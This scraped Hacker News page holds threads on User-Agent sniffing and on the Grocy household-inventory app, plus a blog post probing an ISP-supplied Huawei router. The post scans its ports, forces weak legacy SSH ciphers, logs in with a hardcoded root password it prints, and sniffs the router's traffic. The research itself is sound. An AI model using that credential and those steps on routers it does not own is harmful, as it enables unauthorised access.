niea_11(10000) 3 days ago [-]

If you want to just change the styling and layout of the page depending on the user's device, then you can use css's media queries[0]. But if you want to serve two totally different pages (one for mobile and another for desktop), then I don't see how it can be done without JS or reading the user agent.

[0] : https://developer.mozilla.org/en-US/docs/Web/CSS/Media_Queri...

fny(4155) 3 days ago [-]

There not phasing out User-Agent strings entirely, they're actually upgrading them: https://github.com/WICG/ua-client-hints

It looks like there's more fine grained control in the new version.

tenebrisalietum(10000) 3 days ago [-]

I thought it used Javascript to detect screen size. At least it should react to resize events and if the dimensions are something that align with mobile, it should switch to mobile mode.

untog(2451) 3 days ago [-]

Not usually, no. CSS media queries are used to format according to display size. But as a sibling here has indicated, client hints will replace the user agent here.

kryptiskt(708) 3 days ago [-]

The typical way this is done these days is by media queries in CSS, so you'd write a rule for styling based on screen width, like

        @media (max-width: 550 px) {
           body {
              background-color: white;
           }
        }
turns the background white on small screens.
StillBored(10000) 3 days ago [-]

Can't happen soon enough. As a frequent user of various non-mainstream browsers i'm sick and tired of seeing 'your browser isn't supported' messages with download links to chrome/etc. At least in the case of Falkon it has a built in user agent manager, and I can't remember the last time flipping the UA to firefox/whatever actually caused any problems. Although, i've also gotten annoyed at the sanctimoniousness web sites that tell me my browser is to old because the FF version I've got the UA set to isn't the latest.

y_nk(10000) 1 day ago [-]

if your browser isn't supported, it's not the browser's fault, rather the website you go on not to support your browser.

jorams(4059) 3 days ago [-]

The weird thing about this is that the only company I've seen doing problematic user-agent handling in recent years is Google themselves. They have released several products as Chrome-only, which then turned out to work fine in every other browser if they just pretended to be Chrome through the user agent. Same with their search pages, which on mobile were very bad in every non-Chrome browser purely based on user agent sniffing.

arendtio(10000) 3 days ago [-]

Ikea does it too with some of their tools (just sucks).

asveikau(10000) 3 days ago [-]

A fair number of websites will still block perfectly working features based on what OS you use.

Some examples I've seen using the latest Firefox on *BSD:

Facebook won't let you publish or edit a Note (not a normal post, the builtin Notes app). I think earlier they wouldn't play videos but they might have fixed that.

Chase Bank won't let you log in. Gives you a mobile-looking UI which tells you to upgrade to the latest Chrome or Firefox.

In these cases if you lie and say you're using Linux or Windows it works flawlessly.

cdata(4322) 2 days ago [-]

Chrome team members are face-palming with the best of us whenever a Google product does backwards things like filtering based on user agent string.

Google isn't a singularity ️

willvarfar(534) 2 days ago [-]

To get Microsoft Teams to run in Chromium there used to be a user-agent hack to make it pretend to be Chrome. This was superseded by someone packaging up using Electron. And finally this has been superseded by Micrsoft themselves supporting Linux using something that looks and feels like Electron again.

So, basically, Microsoft using user-agent to detect Chrome....

AndrewKemendo(2823) 3 days ago [-]

I would guess they have built something into chrome that gets even more data that isn't user-agent based.

UA has a lot of limitations and is fairly easy to work around giving data to for power users. I would imagine Google didn't want to keep playing around with that.

sergiotapia(795) 3 days ago [-]

'Oopsie' said Google to Firefox.

jaywalk(10000) 3 days ago [-]

I'm sure Google won't build in some proprietary way for them to identify Chrome.

/s

rovek(10000) 3 days ago [-]

I had been thinking recently as I've been using Firefox more that Google maps had got clunky. With a little fiddling prompted by your comment, it turns out Maps sniffs specifically to reduce fluid animations on Firefox (and probably some other browsers).

currysausage(3962) 3 days ago [-]

If you have the new Chromium-based Edge ('Edgium') installed: the compatibility list at edge://compat/useragent is really interesting.

Edgium pretends to be Chrome towards Gmail, Google Play, YouTube, and lots of non-Google services; on the other hand, it pretends to be Classic Edge towards many streaming services (HBO Now, DAZN, etc.) because it supports PlayReady DRM, which Chrome doesn't.

[Edit] Here is the full list: https://pastebin.com/YURq1BR1

eh78ssxv2f(4045) 3 days ago [-]

Google is probably so big that we might as well consider Chrome and rest of the Google as separate entities.

rocky1138(732) 3 days ago [-]

Facebook also uses the user-agent string to determine which version of a site to send to someone. I installed a user-agent spoofer a while back and messenger.com would fail due to it every few refreshes (as evidenced by JS console).

otabdeveloper2(10000) 2 days ago [-]

> ...which then turned out to work fine in every other browser if they just pretended to be Chrome through the user agent.

Which is probably why Google wants to phase out the user agent.

For sure whatever Google invents to replace it will not be so easily circumvented.

thaumasiotes(3782) 3 days ago [-]

> They have released several products as Chrome-only, which then turned out to work fine in every other browser if they just pretended to be Chrome through the user agent.

This seems like a pretty good reason in itself why they might be interested in phasing out User-Agents.

blntechie(4254) 3 days ago [-]

Every single Google product is slower on Firefox and it's hard to not call this malice and artificial. Many people check out Gmail and GMaps on Firefox and go back to Chrome because of their clunkiness on Firefox.

rozab(10000) 3 days ago [-]

I know Netflix used to block the Firefox on Linux user agent for no reason

dhimes(2852) 3 days ago [-]

Exactly. This is going to turn into a game of whack-a-mole whereby we need to load the latest firefox extension that tricks websites into thinking we're using Chrome.

Or we could build for Firefox. There's always that.

jacobolus(4000) 3 days ago [-]

Here in Safari, Gmail is not only 10x buggier than it used to be before the redesign, it also uses at least 10x more client-side resources (CPU, network, ...). A handful of open Gmail tabs single-handedly use more CPU over here than hundreds of other web pages open simultaneously, including plenty of heavyweight app-style pages.

It's hard to escape the conclusion that Google's front-end development process is completely incompetent and has no respect for customers' battery or bandwidth.

heavyset_go(4321) 3 days ago [-]

Some Google properties are broken on Chromium, even.

fpoling(3619) 3 days ago [-]

The things that replaces the user agent will still be enough to differentiate Chrome from Firefox and Safari.

basscomm(10000) 3 days ago [-]

> The weird thing about this is that the only company I've seen doing problematic user-agent handling in recent years is Google themselves.

I frequently consume web articles with a combination of newsboat + Lynx, and it's astounding how many websites throw up HTTP 403 messages when I try to open a link. They're obviously sniffing my user agent because if I blank out the string (more accurately, just the 'libwww-FM' part, then the site will show me the correct page.

I'm pretty sure that the webmasters responsible for this are using user agent string blocking as a naive attempt to block bots from scraping their site, but that assumes that the bots that they want to block actually send an accurate user agent string the first place.





Historical Discussions: Grocy: web-based, self-hosted grocery and household management (March 21, 2020: 648 points)

(648) Grocy: web-based, self-hosted grocery and household management

648 points 7 days ago by jka in 4309th position

grocy.info | | comments | anchor

ERP beyond your fridge

grocy is a web-based self-hosted groceries & household management solution for your home.

Open Source. Built with passion.

Download Demo

Changelog Install guide Source on GitHub

Current version: 2.6.1 (released on 03/06/2020)

A webserver with PHP 7.2 (or higher) and the SQLite (PDO) extension is required. Currently available localizations: English, German, Danish, Spanish, French, Hungarian, Italian, Dutch, Norwegian, Polish, Portuguese (Brazil), Portuguese (Portugal), Russian, Slovak, Swedish, Turkish and Czech




All Comments: [-] | anchor

samstave(3899) 7 days ago [-]

I freaking applied for HN with this idea and was rejected.. years ago.

Called "standard pantry"

bdcravens(1046) 7 days ago [-]

Remember, a piece of software isn't necessarily a business.

Also, HN!=YC. I assume you meant you applied for YC?

miguelrochefort(915) 6 days ago [-]

Didn't we all?

It's an obvious idea like all the others. We're 2 years from a viable implementation.

sergiotapia(795) 7 days ago [-]

- No business model

- Families (arguably the people who would use this) probably won't use this. It's too much time overhead for minimal gains.

Don't sweat it.

endorphone(3093) 7 days ago [-]

This doesn't validate the idea, if that's what you're implying.

To be necessarily negative, this sort of product has appeared countless times. It fills a need that people just don't have. I have four kids, a wife, a dog, a skinny pig and a bearded dragon. I can internalize shopping lists, as does my wife. It is incredibly rare that we even send reminders to each other of things. The idea of creating and managing an inventory system is just a complete non-starter.

floatingatoll(4062) 7 days ago [-]

What was your revenue model?

jldugger(4306) 7 days ago [-]

I appreciate the community effort but this thing is waaay too unfocused. Batteries, chores and a todo list?

I've been using an app called Cinnamon to handle grocery shopping. The general idea is similar: define a bunch of things you want to keep in stock in your pantry. Every two weeks before a shopping run I do a sub-five minute scan. The app groups by category, which usually helps keep it fast. Anything I'm low on swipe left and it's on the buy list.

In the grocery store, swipe left again as you buy and it's in the cart. Swipe right for 'next time.' (After a certain amount of time, anything in your cart is presumed to have moved back into the pantry, and anything in next time moves to buy list). For multiperson households, you could split the buy list construction from the acquisition.

I guess the key realization here is that data entry is simpler if you only check before planned grocery store runs, and if you can predict how much you need on hand to last between shopping runs. For toiletries its a pretty quick 'do I have an unopened one still?' For food I know some people use meal planning but I just keep stuff on hand and wing it -- spices keep for quite a while and meat freezes fine.

opsgal(10000) 7 days ago [-]

Link to the Cinnamon app? Didn't see something matching description when I searched in App Store.

znpy(1612) 7 days ago [-]

I guess you're not understanding the scope.

It's not like an overkill of shopping list, it's more of a small scale inventory management.

skyfaller(10000) 7 days ago [-]

This is a cool concept, but in addition to all of the concerns other people have voiced, I have a very specific problem: I've been trying to go 'zero waste' and reduce packaging as much possible. This means there is no package to scan, I'm just buying in bulk and putting stuff into bags/jars. There's also no clear expiration date, which is actually somewhat troubling these days, but so far I haven't had bulk stuff go bad b/c I wasn't stockpiling/prepping it.

We'll see what happens during the pandemic, that's definitely thrown a wrench into my low-packaging shopping.

pfranz(10000) 7 days ago [-]

Another thread showed his project that printed labels with QR codes that might be a good fit if you're willing to compromise sticker labels in your zero waste goals.

https://www.thingybase.com/

I use frog tape and a sharpie. After a year+ I'm still on my first roll of frog tape.

If you really want to go zero waste you could with a some sort of color coding system like bread clips use.

njsubedi(3994) 7 days ago [-]

Then stop what you're doing for a while. Problem solved.

satyrnein(4339) 7 days ago [-]

One thought to reduce data entry (for some people): parse freshdirect (etc) emails, with a default expiration date put in. (The pie in the sky version uses machine learning to make better guesses.)

Mathnerd314(3768) 7 days ago [-]

Just from trying the demo, there are default 'shelf life' numbers for the vegetables. But it expects best-by dates for the other stuff. It looks like defaults could be entered in.

fmajid(10000) 5 days ago [-]

I've known about this project for a while, but the coronavirus lockdown led me to install it. Unfortunately, the JavaScript-based UPC/EAN barcode scanning is unusable. Too slow, even on a 2018 Mac Pro, sometimes only scans a partial barcode, and asks for permission to access the camera for every scan. I've ordered a USB bar code scanner, I'll see if that makes it more usable.

I used to have a really neat device called the Hiku. It was essentially a WiFi-enabled hockey-puck sized scanner, with a microphone for voice recognition for items without bar codes, and a UPC database. Sadly they went out of business a few years ago but their app still works (not sure if new users can sign up for it), and is great for shared shopping, e.g. yesterday I was shopping and I could see my wife add items to the list in real time, as well as cross them out.

My main challenge is that I downsized to a much smaller apartment, and a lot of our dry groceries have to go in plastic bins that are shoved in dark corners, so it's hard to know what we have or don't have, leading to duplicated purchases and also wasted food when it expires.

One challenge is the absence of a good universal UPC/EAN database. I tried one with one item from the bin (a box of some obscure knock-offs of Meiji Chocorooms), and when the phone scanner finally managed to get the item right, the online DB identified it as a Disney Princess doll, so it seems UPC/EAN is so badly managed they can't even avoid duplicate codes.

Finally data entry of expiration dates is going to be too cumbersome. A better approach would be to have some sort of of statistical model that estimates the shelf life from the product descriptions, e.g. 2 years for canned goods. Less precise, but more manageable, it could show alerts like 'check how much longer this can of tuna has left', and if still has some ways, you could enter the precise date only then.

fmajid(10000) 5 days ago [-]

I have a workflow for books that is quite efficient, using the Mac app Delicious Library, a Microvision RoV Bluetooth scanner supported by the app (sadly discontined):

https://blog.majid.info/organizing-with-delicious-library/

Sadly I don't have anything that streamlined for groceries.

jahbrewski(10000) 7 days ago [-]

I love the idea of this, but in reality I can't imagine the time and energy required to scan and keep everything up-to-date is offset by the benefits. Perhaps a current user can prove me wrong?

fock(4333) 7 days ago [-]

Just buy some extra rolls of toilet paper!

bradgessler(2194) 7 days ago [-]

I've been doing this with https://www.thingybase.com/, my phone, and a wireless Brother label printer or the past few months. Once you get use to a workflow it's not that bad, and very handy when you are out and about and need to see what's in your deep freezer or in storage.

Edit: I noticed a few people have signed up and are kicking the tires. Please let me know what you'd like to see built for this thing and give feedback in this thread. At the top of my list is: (1) a phone app, (2) better onboarding (3) more fields for quantity, units, custom, etc. (4) attach photos to items, (5) messaging/chat/threads for each item so people can coordinate better on inventory, (6) one-click to "create a posting to sell an item on Craigslist/etc" for getting rid of a thing and, (7) a way of loaning items to friends and showing them what's available for loan.

nogabebop23(10000) 7 days ago [-]

THis is a similar challenge to the widespread problem of tracking expenses for small business. None of the solutions involve manually hand-bombing all the data, so maybe there is another angle that could eb tackled?

viraptor(1912) 7 days ago [-]

I guess you don't have to actually use all the features all the time. I'm doing some of this stuff using anylist where I've got recipes / meal planning / shopping list and it works pretty well. I don't care about keeping stock, but instead every time make a full shopping list, go to the kitchen, and remove things I already have.

Other features could be useful though - The list of batteries could be nice. House tasks as well.

bproctor(10000) 7 days ago [-]

Agree, I love the idea and wanted to make this work for my home, but from personal experience I'd say most people would find this more trouble than it's worth.

I wrote something very similar to this a couple years ago for our household. It runs on a raspberry pi and uses a barcode scanner and when we go shopping we scan everything in and then scan things out as we use them. We live far away from town and shopping trips are rare, big all day events. It's easy to forget to scan things out and then things that don't have barcodes like vegetables are hard to track so we don't bother. Manually entering it all in and then remembering to remove it while cooking is too much trouble (we tried).

z3ncyberpunk(10000) 7 days ago [-]

Agreed. If there was some kind of tech like Amazon's just walk out idea that could automate keeping track of everything it would be great. But having to do this stuff manually kills it. It's the same problem I have with personal money mangers; I have to manually import my bank transactions and then further manually categorize and label them (I've scripted some but can't do most) for it to properly work and give me good graphs and breakdowns.

Mike1232B(10000) 7 days ago [-]

I think this sort of inventory system combined with automatic updates (a la Amazon Go store style OCR embedded in smart fridges, etc) would go a long way. Have always thought this would be useful, but agreed the amount of energy required to manually update everything would be unsustainable.

skeletonjelly(4200) 7 days ago [-]

What about a feature where you scan your receipt and it prompts you for expiry for relevant items? (Dairy etc)

petronio(10000) 7 days ago [-]

For household usage I think it might be helpful to separate items into categories:

- Frequent use

- Infrequent use & stock needed

- Infrequent use & stock not needed

The first category I wouldn't worry about: you know how much you have stocked due to frequently using it, so just jot it down on a simple shopping list as you feel more stock is needed. Both short and long shelf life items can be placed here, you know when you need more sugar or toilet paper, or when something you use frequently might go bad soon.

The second category would be very good to put in a system like this, complete with expiration dates. These might be emergency supplies and medications, things that are easily forgotten about but shouldn't be lacking at any time. Keeping track and being notified of expiration dates would be pretty important.

The final category is personal choice. Since you don't need a stock of it, then it's non-essential. You could place it in a system like the second category, or you could just throw it on a shopping list when it's running out like the first.

sbuttgereit(2338) 7 days ago [-]

You've hit exactly the downfall.

I've always liked the idea of this sort of thing, but the benefits of using something like this almost never outweigh the costs as compared to just eyeballing the pantry and winging the meal planning on short timescales. The system starts to become the point of the effort rather than just a tool to better achieve household goals.

Unless you're dealing with a substantial household or some sort of communal living environment (lots of roommates, half-way house, dorm) or doing a lot of entertaining, the benefits vs. the effort just leave these things as interesting experiments.

And I do see value in experimenting this way. I am an implementation consultant for actual ERP systems and data entry compliance is a real problem in the corporate world, too. There tends to be benefits to the data entry problem there, but the benefits tend to accrue a few degrees of separation from where the entry work takes place... so those that do the work often don't understand the need or importance. So if you solve some of the data capture problem in a small, low risk household environment, you may be able to apply the lessons learned to larger business systems. For example the more you could capture the data 'in flight', like cameras capturing the information as you're putting recently bought groceries away or pulling them out to cook, do that well enough and now the benefits start to be larger in the home... but maybe you can see avenues to reduce the data entry burden in the warehouse, or the data entry processing desks, etc.

But on it's own, using the same old data acquisition patterns as boring old corporate ERP, you're better bet is probably just pen and paper.

wharfjumper(10000) 7 days ago [-]

Wow I'm so happy to have found this. Have you considered clubs, restaurants, cafes etc as a target market? If you wanted to start earning some revenue to host it I think there could be an opportunity more so than home users.

We had started down the track of building a basic version of this for our ski club using MS 'Power Apps'. Our basic process is: 1. Pre-season: estimate requirements based on previous years and do a few large orders with various suppliers for delivery to coincide with the annual food lift (we can't drive all the way to our club). Primarily this is meat and non perishables such as tinned/packaged items, toileteries and cleaning products. 2. Every few days during the season: perform a stock take of what's on-hand in the club. Send to the catering officer. 3. Catering officer orders according to his/her assessment of requirements. Mainly this will be perishables such as fruit/veges, eggs, bread, milk but later in the season may include other items 4. Items are delivered to common stock room and carried up the mountain by club members. Items are checked off the order list provided by the catering officer and added to various storage areas (fridges/freezers, store room, kitchen pantry etc).

Based on a quick run through the demo system I think grocy will meet our requirements for managing consumables.

Additionally club members staying on a particular night are assigned duties by the lodge leader e.g. breakfast dishes, vegetable prep, cooking dinner. We may be able to use the 'Chores' function to help with that.

Personally for home use I would not use this because it would not be practical for our family.

Regarding an additional feature: I would recommend looking at Cozi which we use for a shared family calendar which is really valuable for us. I imagine it would be fairly trivial to add that feature to Grocy.

I'll let you know how we got on with the club. Thanks and hope that helps.

fyrabanks(10000) 7 days ago [-]

I mean no offense, but the consumer version (as OP linked) strikes me as FOSS's answer to the IoT Fridge, a wholly unnecessary device itself.

I'm all about freeing mental bandwidth, but if you can't remember whether or you bought a piece of salmon yesterday, or if you can't be fussed to read the expiration date on a milk carton--adding 'extreme attention to minor details' and 'tedium' to the mix is not going to help.

The right idea here is optimizing restaurant workflows to minimize food waste/deal with seasonal availability/delivery schedules/etc./etc. Take that and slap a nice frontend + tier 1 tech support on top of that? Baby, you got a stew going.

Personally, as a pedant, I actually find this really useful for my current, home situation. :| thanks

itisit(10000) 7 days ago [-]

I'm able to get on remarkably well with grocery shopping without the use of any technology. Feel blessed.

imabluedabbad(10000) 7 days ago [-]

Seriously, can all of this stuff please go away already?

state_less(10000) 6 days ago [-]

Me too. I want to express my deep gratitude to those who sustain myself and others. I show up at the grocery store and encounter a cornucopia of nourishing foods - how lucky am I. This is your time to shine farmers, truck drivers, food processors and grocery store workers. Thank you!

wdb(10000) 6 days ago [-]

These days you can't get much more than a few mandarins, a bottle of orange juice. I haven't had a home-cooked meal since last Saturday only been eating takeaway as the supermarkets are always empty. It's getting ridiculous here in the UK.

sedgjh23(10000) 6 days ago [-]

Same in my city in the US.

tucosan(4343) 7 days ago [-]

I have been contemplating to build a solution based on an rpi with infrared hand scanner and a touch display attached to our fridge.

Now, I use a combination of Todoist, IFTT and google home. 'Hey Google, groceries, add Milk'. Done.

Perfect while cooking. No phone, scanner or any other input device needed.

davidwparker(4132) 7 days ago [-]

Our family does the same, but with Google Home + Google Keep. Shared Costco List, Amazon List, Home depot list, and Grocery list between me and spouse. 'Hey Google, add Milk to the Shopping List' 'Hey Google, add Eggs to the Costco List' No need for third party integrations too.

stblack(10000) 7 days ago [-]

I'm wondering if something like this exists, at a larger scale.

For example, say five or six neighboring households decide to distribute the shopping chore. One person goes to the grocery store, or COSTCO, returning with staples for multiple households.

zebnyc(10000) 7 days ago [-]

Is this a scenario that you encounter often? I have heard of 'buy together' being common / widely used in some Asian countries but not so much in US metropolitan areas.

Disclaimer, my info is purely anecdotal.

yingw787(3944) 7 days ago [-]

This looks cool :) Don't want to be a Debbie Downer in a time of crisis but I feel like you could use Google Sheets + IFTTT in order to accomplish much of the same thing. Would be especially useful if you could auto-tie this into grocery delivery services like Instacart.

jka(4309) 7 days ago [-]

I think it'd be possible to build a client which would GET /objects/shoppinglist from the grocy API[0] to retrieve the shopping list items, which currently have the following schema:

  {
    id integer
    product_id integer
    note string
    amount number
    row_created_timestamp string
  }
Do you know if there are clients for Instacart (and/or other food delivery services) available?

[0] - https://demo.grocy.info/api

a_band(4235) 7 days ago [-]

Who wants this? People who ask themselves, 'Y'know, if I only had an ERP system to manage my refrigerator and batteries'? This seems very poorly conceived.

bdcravens(1046) 7 days ago [-]

I think pretty much every developer has tedious tasks in their life that they 'just know' they could improve via an app. Meal planning, kid's chores, financial budgets, you name it - many have considered for 2 seconds building their own. Most of us don't have time. Needless to say, I think this is infinitely more valuable than another meme generator.

detaro(2067) 7 days ago [-]

Poorly conceived because ... such people don't exist? The majority of people doesn't need it? ...?

ron22(10000) 7 days ago [-]

Very cool. What information is automatically imported to your list when scanning a barcode? Is it just the name of the product?

madacol(10000) 7 days ago [-]
six2seven(10000) 7 days ago [-]

This is exactly what I needed and was thinking about building a similar app. But to be really useful and automated, there's a bit long way I'm afraid. The biggest deal breaker is the time spend for the data entry and updates, leaving a pen-and-paper / notes solution still the most easy to use and just visiting local groceries and shops. I was collecting receipts and playing a bit with scanning of these, but the amount of noise in the data and inconsistencies between shops were a bit pushing away (unless you want to dedicate time cleaning the data and training own tailored information extraction models).

One of the options to solve the data entry could be: - good quality automatic scanning of receipts (not only individual barcodes) from shops using OCR possibly supported with image recognition for double-checking (can happen that products will be mis-labelled or without quantities, etc) - when ordering on-line, the receipt should be available, so should be also much easier Yet, not always one will have a meaningful receipt available...

Solved the data entry and being able to predict own's supply needs would be also great to have a up-to date management of the inventory. Here are even more challenges on the tracking of the available goods at home, where these are and how many items (and in what state, expiration date, etc) would require most probably implementing different solutions from IoT (connected cameras, sensors, etc.).

Then, having a connected home with own groceries supplies under control, one can then automate further the shopping process with feeding-back the information about own's demand to on-line groceries one is subscribed to. This can enable customer subscription plans, and for retailer keeping a possible continuous flow of goods. This could be really really useful especially for upcoming months, when it seems like we are expected to spend a bit more time at home rather than usual, hopefully not fighting in the local shops for the last rolls of the new white paper gold.

hackme1234(4215) 6 days ago [-]

Agree. This is good for hobbyists but a pen and paper solution is so much simpler.

NamTaf(4318) 7 days ago [-]

Absolutely agree with everything you've said. I had dreamed of a Libib[1] for my kitchen, but knew I would have to do all the painful data adding and it was too much of a bother.

The other big challenge I never resolved was how you'd account for e.g. using 1/4 cup of flour out of a bigger volume. Or taken to its extreme, cooking oil. How do you know how much your 'splash' is? You can't predict the remaining volume without a lot of fiddling to measure it and that defeats the purpose.

In the end, I opted for manual databases too, but they're pain to keep up-to-date. I still think there's a lot of value in a database for all-or-nothing style ingredients, but it was enough to deter me. I'm glad someone is less lazy.

[1]: https://www.libib.com/

starpilot(1590) 7 days ago [-]

With the image recognition, I think the dream might be: take a picture of your shopping cart or basket, recognize any product that is at no more than 50% occluded. Put a red square around any item not recognized, let the user pick it up and rotate it until it's recognized.

toss1(4314) 7 days ago [-]

Just discovered a potential workaround with one vendor.

It turns out that with an Amazon Prime account and shopping at Whole Foods the entire history is available down the the SKU, quantity, and date. Discovered this when going to order a delivery for the first time in the COVID-19 outbreak - aside from the generic shopping selection, we can also pick from our own previous purchases.

I haven't checked if there are other methods to access the data (e.g., with the app, or some history list), but there's the potential for at least some screen-scraping, and maybe they'll make the history available in a downloadable file if we pester them? It'd certainly help both this app and making their stores a bit 'stickier'.

MidgetGourde(10000) 7 days ago [-]

Me too, was thinking about creating simple web app. for myself. Purely from the view of food wastage. I live alone and it's pretty difficult sometimes being able to plan meals when some food packs don't last. Freezable things are OK, but sometimes the salad goes in the bin. Tracking these things avoids purchasing any unnecessary items from the shop. Will check this out.

jka(4309) 7 days ago [-]

If you were going to tackle the ingredient data-entry problem, what would your preferred system design be?

On the other end of the system, I'm hoping to implement a way to bulk load recipes into grocy, using the open source recipe-scrapers[0] library.

[0] - https://github.com/hhursev/recipe-scrapers

huffmsa(10000) 7 days ago [-]

Sound like you stole my notebook on this subject.

homarp(581) 7 days ago [-]

there is https://github.com/Forceu/barcodebuddy that integrates with grocy: 'If already in Grocys system, it will consume/add/open the product in Grocy. If an unknown barcode is passed, the product name will be looked up and a corresponding product can be chosen in the Web UI. Tags can be saved - if a new product contains the tag in the name, the product will be already preselected in the drop-down list.'

zebnyc(10000) 7 days ago [-]

I would imagine that all this tracking & automation would hit have to address the concerns of security/privacy.

Also, costs would simply explode making the whole solution a non-starter for a lot of households.

cheez(10000) 7 days ago [-]

I would be OK if we can take a receipt, or an order email, dump it into the system and it takes best guesses. For automation, at least.

chipperyman573(4050) 7 days ago [-]

If you shop at walmart, there is an option to add a receipt to your account by scanning the barcode in the app (or it shows up by itself when you use walmart pay). These can be retrieved online from anywhere (not just the app) and is how I do it, way easier than you think. It basically comes down to

$('.icon-button-children').each((index, item) => ($(item).click())) // expand all items

$('.LinesEllipsis ').each((index, item) => console.log(item.innerText)) // record the stuff

on https://www.walmart.com/account

bauerd(10000) 7 days ago [-]

Re data entry: was thinking this through a lot recently. Basically what I'd like to build requires either (1) product recognition vision like Google Lens offers, or (2) a barcode scanner and an extensive barcode product database. Both can be combined of course.

My solution would be to read frames from a smartphone's camera until a barcode is detected. This can be achieved with eg Firebase ML, on-device. If a barcode database lookup gives a product, put it on the in/out list. If not, send the frame to a product recognition vision service. This could be Google Cloud Vision AI, but they don't give you access to their product set that backs Google Lens.

Finally, provide controls to adjust the number of items on the in/out list

I thought about OCRing supermarket receipts too but these differ so greatly in layout etc. per country I figured it's not the way to go

Edit: Problem you run into as not all of this can be done on-device is privacy concerns of coursem just my thoughts on what interface I'd like to have

cheschire(10000) 7 days ago [-]

I imagine a future evolution of this could be embedding it on a raspi with a USB barcode scanner, and putting a control screen in your pantry.

knicholes(10000) 7 days ago [-]

You can read barcodes with your phone camera. No additional hardware required.

dakial1(4315) 7 days ago [-]

The main challenge (as other pointed out) is in the data entrey (and update). I see the options as:

Grocery Input (easiest):

- Receipt Scanning and OCR - Easiest as people don't change supermarkets and groceries too often, so identify once the item in the receipt and it will be always recognized.

- Bar Code Scanning - Also possible but too much work to scan each item, and some items don't have a code.

- Visual Recognition - Video Camera or periodic photos of the grocery storage, hard to do.

- RFID tags and portals - I dream that one day barcode will be substituted by RFID tags, then it would be feasible to have a portal wherever you keep your groceries.

- API - If any supermarket offers that sort of thing for receipt data

Grocery Update/Usage (Hardest):

- Recipe usage - By the estimated usage of every recipe you make (like Grocy tries to do), but that doesn't cover everything that is not on recipes (like cleaning products)

- Visual Recognition - The same as above, if it can recognize groceries going in, it can recognize groceries going out

- RFID tags and Portals - The same dream as above

- ML - By the frequency of your product purchase, a machine learning model might be able to predict when you should buy a new item.

ehsankia(10000) 7 days ago [-]

All this solution only solve one half of the problem, which is input. But there's also the other half which is marking them as you use the items. Yet another part which also needs to be considered is the separate input for the expiration tracking. The latter may be solvable if you approximate lengths for each product in a database, and you assume that the product you bought is starts at 0.

But yeah, even if you can simplify the first part as your post describes, there's still a lot more work to maintain the data beyond that.

danzig13(10000) 7 days ago [-]

Do not make the same mistake as regular ERP. If APIs are available, try to integrate to sources of data people actually use vs direct user input.

danzig13(10000) 7 days ago [-]

Kroger has an API for some things:

https://developer.kroger.com/reference/





Historical Discussions: A detailed look at the router provided by my ISP (March 25, 2020: 589 points)

(594) A detailed look at the router provided by my ISP

594 points 3 days ago by paddlesteamer in 10000th position

0x90.psaux.io | Estimated reading time – 7 minutes | comments | anchor

I have been living in my current apartment for more than a year now and I noticed I have never inspected my router which was provided by my ISP when I moved in. The only thing I changed in router is the default login password(admin/password) to the web interface. So I decided to take a more detailed look.

It is an Huawei HG253s router and is widely used by Turkcell Superonline customers since it comes with the internet plan. Actually, Turkcell Superonline enforces the use of these modems by not allowing devices whose MAC addresses are different than these pre-registered Huawei routers. It is possible to do a MAC cloning with another router but still you need to buy one of these pre-registered Huawei routers to learn a legit MAC address.

The first thing I did was initiate a fast nmap scan on the router to see if there is open ssh or telnet port.

1  2  3  4  5  6  7  8  9  10  11  12  13  
$ nmap -F 192.168.1.1  Starting Nmap 7.80 ( https://nmap.org )  Nmap scan report for 192.168.1.1  Host is up (0.0018s latency).  Not shown: 95 filtered ports  PORT    STATE SERVICE  21/tcp  open  ftp  22/tcp  open  ssh  80/tcp  open  http  443/tcp open  https  631/tcp open  ipp    Nmap done: 1 IP address (1 host up) scanned in 7.24 seconds  

We can see that there is an ssh port open. So let's try to connect with admin user:

1  2  
$ ssh [email protected]  Unable to negotiate with 192.168.1.1 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1  

This is an unexpected response. The router offers legacy diffie-hellman-group1-sha1 key exchange method. According to this openssh page:

OpenSSH supports this method, but does not enable it by default because is weak and within theoretical range of the so-called Logjam attack.

But we can enable it with KexAlgorithms option. So let's try again:

1  2  
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]  Unable to negotiate with 192.168.1.1 port 22: no matching cipher found. Their offer: 3des-cbc  

Again another legacy offer. Let's enable the cipher and connect again:

1  2  
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+3des-cbc [email protected]  [email protected]'s password:  

Now it asks password but what is it? I tried the default password(superonline) and the password I set to the web interface with no luck. After a little bit search on the internet I found out there is another user called Root(surprise!) goes by R8Ibq_2K15Gna as the default password for my firmware version HG253sC01B039. One more time then:

1  2  3  4  5  6  7  
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+3des-cbc [email protected]  [email protected]'s password:   PTY allocation request failed on channel 0  -------------------------------  -----Welcome to ATP Cli------  -------------------------------  ATP>  

It worked but I don't know what ATP Cli is. Again after a little bit of search on the internet reveals it is some kind of control/test interface that should respond to some commands. I tried some commands but only help returned a response.

1  2  3  4  5  6  7  8  9  10  11  12  13  14  
ATP>shell  shell  ATP>sh  sh  ATP>whoami  whoami  ATP>date  date  ATP>help  help  Welcome to ATP command line tool.  If any question, please input '?' at the end of command.    ATP>  

We know it is responsive since it returned a response to help command but it is obviously highly restricted. I tried to find my version of the firmware (which is the latest one by the way) to get my hands on this ATP Cli binary but it turned out that neither Huawei nor Turkcell Superonline has published any version of the firmware. It is very unusual. There should be an upgrade mechanism since I know there are routers running older firmware. So I decided to sniff my router's network.

In order to achieve this, I gathered two USB-ethernet convertors and my debian laptop. I will use bridge-utils and a network sniffer's favorite tool: Wireshark. To create a bridge, run:

Then bond interfaces to the bridge:

1  
brctl addif br0 eth0 eth1  

Disable multicast snooping

1  
echo 0 > /sys/devices/virtual/net/br0/bridge/multicast_snooping  

And run wireshark on eth0 or eth1. Note that both interfaces are in promiscuous mode.

Interesting! After initializing PPPoE session, we can see a DNS query is made for acs.superonline.net and a TLS connection made to that IP address. Due to the nature of TLS connections, it isn't possible to see the content of the communication but we can assume the router uses TR-069 protocol since ACS most probably stands for Auto Configuration Server which is an element of this specification. And better than that, probably it is used to upgrade firmware thus we may sniff it over the air.

This is the end of first part. In the next part, I'll try to sniff the communication between acs.superonline.net and my router and also modify it if it's applicable/necessary.




All Comments: [-] | anchor

1_player(3923) 2 days ago [-]

Very interesting article.

What about that precompiled .ssh/authorized_keys with user [email protected] mentioned in Part 3?

Any reason why a router firmware would permit root access to anyone at all? Definitely sounds like a backdoor to me.

skoskie(10000) 2 days ago [-]

